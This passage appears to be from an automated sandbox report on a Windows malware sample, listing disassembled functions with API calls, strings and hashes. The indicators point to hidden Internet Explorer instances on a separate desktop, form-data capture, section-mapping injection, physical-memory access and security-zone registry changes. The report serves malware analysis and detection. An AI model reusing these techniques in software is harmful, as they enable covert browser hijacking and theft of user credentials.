                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            Function 00401B9F Relevance: 26.7, APIs: 11, Strings: 4, Instructions: 487memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            Function 00402822 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            Function 00402E06 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 337libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            Function 004037AA Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            Function 004054D7 Relevance: 15.1, APIs: 10, Instructions: 109stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            Function 00405F5B Relevance: 13.6, APIs: 9, Instructions: 64stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            Function 0040289A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            Function 0040509B Relevance: 12.0, APIs: 1, Strings: 7, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • yes, xrefs: 0040510E
                            • 1601, xrefs: 004050D4
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • BrowseNewProcess, xrefs: 00405113
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            • GlobalUserOffline, xrefs: 004050FA
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            Function 004077E4 Relevance: 10.6, APIs: 7, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            Function 004036B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            Function 00405613 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            Function 0040431F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
